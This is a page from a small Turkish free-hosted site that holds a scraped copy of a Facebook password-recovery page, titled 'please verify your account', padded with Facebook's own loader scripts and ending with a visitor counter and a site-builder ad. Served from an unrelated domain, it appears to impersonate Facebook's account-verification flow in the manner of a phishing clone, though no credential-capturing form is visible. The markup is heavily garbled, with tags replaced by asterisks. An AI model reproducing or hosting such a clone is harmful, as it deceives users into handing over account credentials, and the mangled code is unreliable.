BilginSayar, bilginsayar.tr.gg, Html Kodlar, Fbml Kodları, Css Tasarımlar, İceblue, Tasarımlar, Java Kodlar, Sitene Kod
  fsafgasg
 
<**** charset="utf-8" />**********function envFlush(a){function b(c){for(var d in a)c[d]=a[d];}if(window.requireLazy){requireLazy(['Env'],b);}else{Env=window.Env||{};b(Env);}} envFlush({"user":"0","locale":"tr_TR","method":"GET","svn_rev":671911,"tier":"","vip":"31.13.64.4","static_base":"https://s-static.ak.facebook.com/","www_base":"http://www.facebook.com/","rep_lag":2,"fb_dtsg":"AQCld6oo","ajaxpipe_token":"AXiCHz3XOZzlpLVQ","lhsh":"gAQGgPDc7","tracking_domain":"https://pixel.facebook.com","retry_ajax_on_network_error":"1","fbid_emoticons":"1"});**********envFlush({"eagleEyeConfig":{"seed":"0BYT"}});CavalryLogger=false;window._script_path = "WebRecoverPasswordController";<**** name="robots" content="noodp, noydir" /><**** name="referrer" content="default" id="****_referrer" /><**** name="description" content=" Facebook, insanları arkadaşlarıyla ve çevrelerinde yaşayan, çalışan ya da okuyan diğer insanlarla buluşturan sosyal bir araçtır. İnsanlar Facebook'u arkadaşlarından haberdar olmak, sınırsız sayıda fotoğraf yüklemek, bağlantı ve videolar paylaşmak ve tanıştıkları insanları daha yakından tanımak için kullanıyor." /> Facebook **********window.Bootloader && Bootloader.done(["j2Y1E"]);**********new (require("ServerJS"))().handle({"require":[["lowerDomain"],["QuicklingPrelude"],["Primer"]]})
 
a />

Lütfen Hesabını Doğrula

 
Lütfen Facebook'un aldığı bilgiler ve nasıl kullanıldıkları hakkında daha fazla bilgi almak için Veri Kullanımı İlkemizi ve Facebook'u kullanırken kabul ettiğiniz koşullar hakkında bilgi almak için Hak ve Sorumluluklar Bildirimi'ni (Koşullar) okuyun.
Daha fazla bilgi almak için lütfen yardım sayfasını ziyaret ediniz.
 
**********Bootloader.setResourceMap({"M7bAm":{"type":"css","permanent":1,"src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/yY/r/ypChFAdKEum.css"},"jg0IV":{"type":"css","permanent":1,"src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/yz/r/bkO4dNVD63t.css"},"mkPvm":{"type":"css","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/yD/r/Vas44Fdbl3v.css"},"gYYej":{"type":"css","permanent":1,"src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/ys/r/ltme-qREmd_.css"},"X/Fq6":{"type":"css","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/y6/r/YlbIHaln_Rk.css"},"VDymv":{"type":"css","permanent":1,"src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/ye/r/4AC1A2FNTqE.css"}});Bootloader.setResourceMap({"JU6Q1":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/yx/r/VAx7n6yWRfc.js"},"MX2xp":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/yx/r/VfJQRNBtvcL.js"},"UjXTQ":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/yr/r/2Mh25GaL3gk.js"},"xFwdW":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/ym/r/-myuyh1wc2p.js"},"TsDzh":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/ye/r/oxgrQXGrqPM.js"},"gM1Bs":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/yg/r/06gL2cYQx4m.js"},"oE4Do":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/yD/r/65c9OW-i481.js"},"rKoQM":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/yg/r/EzKkrJB7yPp.js"},"MqSmz":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/yH/r/ghlEJgSKAee.js"},"cNca2":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/yn/r/XQ1IPAI9NyR.js"},"So3Xq":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/yR/r/8sclUcgLaZW.js"},"bwsMw":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/y_/r/hwOyT9fmfZV.js"},"NAQYQ":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/yd/r/o5N5IZth-14.js"},"zyFOp":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/y4/r/61VSNDvRJnS.js"},"XNAD8":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/yX/r/yBT0rT-LiI5.js"},"7yfEw":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/y1/r/XL9ksIVXR0k.js"},"XQYFa":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/yp/r/dyF7JsE9Cto.js"},"2ma5f":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/yo/r/hCn6u3fXLtg.js"},"wxq+C":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/y6/r/rLApwwzLwbi.js"},"DZmeF":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/y2/r/ZeZFU7zHXuC.js"},"H42Jh":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/y3/r/ppwOo4BAmlb.js"},"AtxWD":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/y1/r/fvXyHGM5qlP.js"},"q9ECf":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/y4/r/059HuoRuX3I.js"},"bs0gy":{"type":"js","src":"https://s-static.ak.fbcdn.net/rsrc.php/v2/y9/r/KamU7KNCYdj.js"}}); Bootloader.enableBootload({"AsyncDOM":{"resources":["JU6Q1","gM1Bs"],"module":true},"ConfirmationDialog":{"resources":["JU6Q1","MX2xp","oE4Do"],"module":true},"Dialog":{"resources":["JU6Q1","MX2xp","M7bAm"],"module":true},"IframeShim":{"resources":["JU6Q1","MX2xp","rKoQM","MqSmz"],"module":true},"ErrorSignal":{"resources":["JU6Q1","cNca2"],"module":true},"event-extensions":{"resources":["JU6Q1"],"module":true},"AsyncDialog":{"resources":["JU6Q1","MX2xp","rKoQM","M7bAm"],"module":true},"FbdDialogProvider":{"resources":["So3Xq","JU6Q1","bwsMw"],"module":true},"React":{"resources":["gM1Bs"],"module":true},"AsyncRequest":{"resources":["JU6Q1"],"module":true},"PhotoSnowlift":{"resources":["JU6Q1","MX2xp","rKoQM","M7bAm","NAQYQ"],"module":true},"SpotlightShareViewer":{"resources":["JU6Q1","MX2xp","X/Fq6","zyFOp"],"module":true},"PhotoTagger":{"resources":["JU6Q1","MX2xp","M7bAm","NAQYQ","rKoQM","XNAD8"],"module":true},"fb-photos-snowlift-css":{"resources":["gYYej","M7bAm"]},"Live":{"resources":["JU6Q1","gM1Bs"],"module":true},"PhotoTagApproval":{"resources":["JU6Q1","NAQYQ","7yfEw"],"module":true},"PhotoTags":{"resources":["JU6Q1","NAQYQ","M7bAm","XNAD8"],"module":true},"TagTokenizer":{"resources":["JU6Q1","NAQYQ","XQYFa","7yfEw","M7bAm","rKoQM"],"module":true},"fb-photos-snowlift-fullscreen-css":{"resources":["VDymv"]},"PhotoPivot":{"resources":["JU6Q1","MX2xp","NAQYQ","rKoQM","M7bAm","2ma5f"],"module":true},"SnowliftPicCropper":{"resources":["JU6Q1","MX2xp","M7bAm","NAQYQ","rKoQM","jg0IV","XNAD8","wxq+C"],"module":true},"PhotosButtonTooltips":{"resources":["JU6Q1","rKoQM","MX2xp","M7bAm","DZmeF"],"module":true},"VideoRotate":{"resources":["JU6Q1","H42Jh"],"module":true},"AsyncResponse":{"resources":["JU6Q1"],"module":true},"PhotoInlineEditor":{"resources":["JU6Q1","NAQYQ","rKoQM","MX2xp","M7bAm","7yfEw","AtxWD"],"module":true},"Form":{"resources":["JU6Q1","MX2xp"],"module":true},"Toggler":{"resources":["JU6Q1","MX2xp","M7bAm","rKoQM"],"module":true},"Tooltip":{"resources":["JU6Q1","rKoQM","MX2xp","M7bAm"],"module":true},"DOM":{"resources":["JU6Q1"],"module":true},"Input":{"resources":["JU6Q1"],"module":true},"trackReferrer":{"resources":[],"module":true},"DimensionTracking":{"resources":["JU6Q1"],"module":true},"HighContrastMode":{"resources":["JU6Q1"],"module":true},"detect-broken-proxy-cache":{"resources":["JU6Q1"]},"link-rel-preload":{"resources":["JU6Q1"]},"legacy:dialog":{"resources":["JU6Q1","MX2xp","M7bAm"]},"legacy:ajaxpipe":{"resources":["JU6Q1","MX2xp","q9ECf"]},"legacy:async":{"resources":["JU6Q1"]},"legacy:PhotoSnowlift":{"resources":["JU6Q1","MX2xp","rKoQM","M7bAm","NAQYQ","bs0gy"]},"legacy:Toggler":{"resources":["JU6Q1","MX2xp","M7bAm","rKoQM"]}}); **********require("InitialJSLoader").loadOnDOMContentReady(["JU6Q1","MX2xp","UjXTQ","xFwdW","TsDzh"]); ********** Bootloader.configurePage(["M7bAm","jg0IV","mkPvm","gYYej"]); Bootloader.done(["jDr+c"]); new (require("ServerJS"))().handle({"elements":[["m239439_1","uus8wvi3",2]],"define":[["BanzaiConfig",[],{"MAX_SIZE":10000,"MAX_WAIT":60000,"COMPRESSION_THRESHOLD":800,"gks":{"jslogger":true,"miny_compression":true,"notifications":true,"time_spent":true,"time_spent_debug":true,"useraction":true}}]],"require":[["PixelRatio","startDetecting",[],[1]],["Intl","setPhonologicalRules",[],[{"****":{"/_C/":"(u015f|u00e7|b|c|d|f|g|u011f|h|j|k|l|m|n|p|q|r|s|t|v|w|x|y|z|B|C|D|F|G|u011e|H|J|K|L|M|N|P|Q|R|S|T|V|W|X|Y|Z)","/_T/":"(u015f|u00e7|p|t|k|s)","/_V/":"(a|e|i|o|u|A|E|I|O|U|?|y|??Y)","/_B/":"([.,!?s]|^)","/_E/":"([.,!?s]|$)"},"patterns":{"/'/":"'","/(u2018|u2019)/":"'","/((a|u0131|A|I|u|o|U|O)_C*)u0001 de/da_E/":"$1u0001 da$4","/((e|i|E|u0130|u00f6|u00fc|u00d6|u00dc)_C*)u0001 de/da_E/":"$1u0001 de$4","/((a|u0131|A|I|u|o|U|O)_C*_T)u0001'Da(ki|n|)_E/":"$1u0001'ta$5$6","/((e|i|E|u0130|u00f6|u00fc|u00d6|u00dc)_C*_T)u0001'Da(ki|n|)_E/":"$1u0001'te$5$6","/((a|u0131|A|I|u|o|U|O)_C*)u0001'Da(ki|n|)_E/":"$1u0001'da$4$5","/((e|i|E|u0130|u00f6|u00fc|u00d6|u00dc)_C*)u0001'Da(ki|n|)_E/":"$1u0001'de$4$5","/(e|i|E|u0130)u0001'(n)in_E/":"$1u0001'nin$2","/(a|u0131|A|I)u0001'(n)in_E/":"$1u0001'nu0131n$2","/(u00f6|u00fc|u00d6|u00dc)u0001'(n)in_E/":"$1u0001'nu00fcn$2","/([uoUO])u0001'(n)in_E/":"$1u0001'nun$2","/(_Cy)u0001'(n)in_E/":"$1u0001'nin$3","/((e|i|E|u0130)_C+)u0001'(n)in_E/":"$1u0001'in$4","/((a|u0131|A|I)_C+)u0001'(n)in_E/":"$1u0001'u0131n$4","/((u00f6|u00fc|u00d6|u00dc)_C+)u0001'(n)in_E/":"$1u0001'u00fcn$4","/([uoUO]_C+)u0001'(n)in_E/":"$1u0001'un$3","/(e|i|E|u0130)u0001'(y)e_E/":"$1u0001'ye$2","/(a|u0131|A|I)u0001'(y)e_E/":"$1u0001'ya$2","/(u00f6|u00fc|u00d6|u00dc)u0001'(y)e_E/":"$1u0001'ye$2","/([uoUO])u0001'(y)e_E/":"$1u0001'ya$2","/(_Cy)u0001'(y)e_E/":"$1u0001'ye$3","/((e|i|E|u0130)_C+)u0001'(y)e_E/":"$1u0001'e$4","/((a|u0131|A|I)_C+)u0001'(y)e_E/":"$1u0001'a$4","/((u00f6|u00fc|u00d6|u00dc)_C+)u0001'(y)e_E/":"$1u0001'e$4","/([uoUO]_C+)u0001'(y)e_E/":"$1u0001'a$3","/(e|i|E|u0130)u0001'(y)i_E/":"$1u0001'yi$2","/(a|u0131|A|I)u0001'(y)i_E/":"$1u0001'yu0131$2","/(u00f6|u00fc|u00d6|u00dc)u0001'(y)i_E/":"$1u0001'yu00fc$2","/([uoUO])u0001'(y)i_E/":"$1u0001'yu$2","/(_Cy)u0001'(y)i_E/":"$1u0001'yi$3","/((e|i|E|u0130)_C+)u0001'(y)i_E/":"$1u0001'i$4","/((a|u0131|A|I)_C+)u0001'(y)i_E/":"$1u0001'u0131$4","/((u00f6|u00fc|u00d6|u00dc)_C+)u0001'(y)i_E/":"$1u0001'u00fc$4","/([uoUO]_C+)u0001'(y)i_E/":"$1u0001'u$3","/u0001'Da(ki|n|)_E/":"u0001'da$1$2","/u0001'(n)in_E/":"u0001'in$1","/u0001'(y)e_E/":"u0001'e$1","/u0001'(y)i_E/":"u0001'i$1","/u0001 de/da_E/":"u0001 de$1","/_u0001([^u0001]*)u0001/e":"mb_strtolower("u0001$1u0001")","/^x01([^x01])(?=[^x01]*x01)/e":"mb_strtoupper("u0001$1")","/_u0001([^u0001]*)u0001/":"javascript"}}]],["PostLoadJS","loadAndRequire",[],["DimensionTracking"]],["PostLoadJS","loadAndCall",[],["HighContrastMode","init",["0"]]],["ClickRefLogger"],["userAction","setUATypeConfig",[],[{"uan":false,"uai":false,"uad":false,"uae":false}]],["ScriptPathState","setUserURISampleRate",[],[0.0002]],["userAction","setCustomSampleConfig",[],[{"uan":{"test":{"test":true}}}]],["v6check"],["UserActionHistory"],["TinyViewport"],["WebStorageMonster","schedule",[],[false]],["AsyncRequestNectarLogging"]]}); onloadRegister_DEPRECATED(function (){setup_password_feedback("password_confirm","password_confirm_status","password_new","password_new_status","btn_continue");}); onafterloadRegister_DEPRECATED(function (){Bootloader.loadComponents(["detect-broken-proxy-cache"], function(){ detect_broken_proxy_cache("0", "c_user") });}); onafterloadRegister_DEPRECATED(function (){Bootloader.loadComponents(["link-rel-preload"], function(){ link_rel_preload() });}); **********var bigPipe = new (require('BigPipe'))({"lid":0,"forceFinish":true}); **********bigPipe.onPageletArrive({"is_last":true,"css":["M7bAm","jg0IV","mkPvm","gYYej"],"js":["JU6Q1","MX2xp","UjXTQ","xFwdW","TsDzh"],"id":"first_response","phase":0}) **********bigPipe.onPageletArrive({"is_last":true,"css":["M7bAm","jg0IV","mkPvm","gYYej"],"js":["JU6Q1","MX2xp","UjXTQ","xFwdW","TsDzh"],"id":"","phase":1,"the_end":true})
 
  вυgüη 24932 ziyaretçi (55147 klik) кιşι вυя∂αу∂ı!!!  
 
=> Sen de ücretsiz bir internet sitesi kurmak ister misin? O zaman burayı tıkla! <=